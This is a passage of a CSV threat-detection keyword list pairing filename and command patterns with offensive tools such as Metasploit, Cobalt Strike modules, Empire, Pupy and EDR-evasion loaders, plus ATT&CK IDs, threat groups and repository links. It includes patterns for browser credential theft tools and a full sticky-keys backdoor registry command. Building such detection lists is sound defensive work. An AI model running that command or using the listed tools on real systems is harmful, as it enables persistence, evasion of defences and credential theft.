TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","486","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*reflective_dll.dll*",".{0,1000}reflective_dll\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*reflective_dll.x64.dll*",".{0,1000}reflective_dll\.x64\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","1","N/A","10","10","161","24","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z" "*reflective_dll.x64.dll*",".{0,1000}reflective_dll\.x64\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*reflective_dll_inject*",".{0,1000}reflective_dll_inject.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*reflective_pe_loader.*",".{0,1000}reflective_pe_loader\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ReflectiveDll.*",".{0,1000}ReflectiveDll\..{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*ReflectiveDll.x64.dll*",".{0,1000}ReflectiveDll\.x64\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","10","10","107","25","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z" "*ReflectiveDll.x86.dll*",".{0,1000}ReflectiveDll\.x86\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","10","10","107","25","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z" "*ReflectiveDLLInjection*",".{0,1000}ReflectiveDLLInjection.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ReflectiveDLLInjection.*",".{0,1000}ReflectiveDLLInjection\..{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*ReflectiveDLLInjection.*",".{0,1000}ReflectiveDLLInjection\..{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*ReflectiveDLLInjection.*",".{0,1000}ReflectiveDLLInjection\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ReflectiveDllInjection.*",".{0,1000}ReflectiveDllInjection\..{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*ReflectiveDLLInjection.h*",".{0,1000}ReflectiveDLLInjection\.h.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","10","2","172","27","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z" "*ReflectiveDLLInjection/dll*",".{0,1000}ReflectiveDLLInjection\/dll.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*Reflective-HackBrowserData*",".{0,1000}Reflective\-HackBrowserData.{0,1000}","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","1","N/A","10","10","161","24","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z" "*Reflective-HackBrowserData*",".{0,1000}Reflective\-HackBrowserData.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","10","10012","1478","2024-05-01T17:51:49Z","2020-06-18T03:24:31Z" "*ReflectiveLoader.*",".{0,1000}ReflectiveLoader\..{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*ReflectiveLoader.c*",".{0,1000}ReflectiveLoader\.c.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ReflectiveLoader.c*",".{0,1000}ReflectiveLoader\.c.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*ReflectiveLoader.cpp*",".{0,1000}ReflectiveLoader\.cpp.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","10","2","172","27","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z" "*ReflectiveLoader.cpp*",".{0,1000}ReflectiveLoader\.cpp.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ReflectiveLoader.h*",".{0,1000}ReflectiveLoader\.h.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*ReflectiveNTDLL.cpp*",".{0,1000}ReflectiveNTDLL\.cpp.{0,1000}","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","9","3","286","41","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" "*ReflectiveNTDLL.exe*",".{0,1000}ReflectiveNTDLL\.exe.{0,1000}","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","9","3","286","41","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" "*ReflectiveNTDLL.sln*",".{0,1000}ReflectiveNTDLL\.sln.{0,1000}","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","9","3","286","41","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" "*ReflectiveNTDLL.vcxproj*",".{0,1000}ReflectiveNTDLL\.vcxproj.{0,1000}","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","9","3","286","41","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" "*ReflectiveNtdll-main*",".{0,1000}ReflectiveNtdll\-main.{0,1000}","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","1","N/A","10","2","159","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" "*ReflectivePick_x64_orig.dll*",".{0,1000}ReflectivePick_x64_orig\.dll.{0,1000}","offensive_tool_keyword","empire","Empire dll paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1112","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*ReflectivePick_x86_orig.dll*",".{0,1000}ReflectivePick_x86_orig\.dll.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1113","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*RefleXXion*ntdll.dll*",".{0,1000}RefleXXion.{0,1000}ntdll\.dll.{0,1000}","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","10","5","478","103","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z" "*RefleXXion.sln*",".{0,1000}RefleXXion\.sln.{0,1000}","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","10","5","478","103","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z" "*RefleXXion-DLL*",".{0,1000}RefleXXion\-DLL.{0,1000}","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","10","5","478","103","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z" "*RefleXXion-EXE*",".{0,1000}RefleXXion\-EXE.{0,1000}","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","10","5","478","103","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z" "*RefleXXion-main*",".{0,1000}RefleXXion\-main.{0,1000}","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","10","5","478","103","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z" "*REG ADD ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"" /v Debugger /t REG_SZ /d ""C:\windows\system32\cmd.exe""*",".{0,1000}REG\sADD\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\sNT\\CurrentVersion\\Image\sFile\sExecution\sOptions\\sethc\.exe\""\s\/v\sDebugger\s\/t\sREG_SZ\s\/d\s\""C\:\\windows\\system32\\cmd\.exe\"".{0,1000}","offensive_tool_keyword","Windows-Crack","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/japd06/Windows-Crack/","1","0","N/A","9","1","15","9","2019-04-17T21:54:13Z","2019-06-19T04:00:51Z" "*reg add ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer"" /v 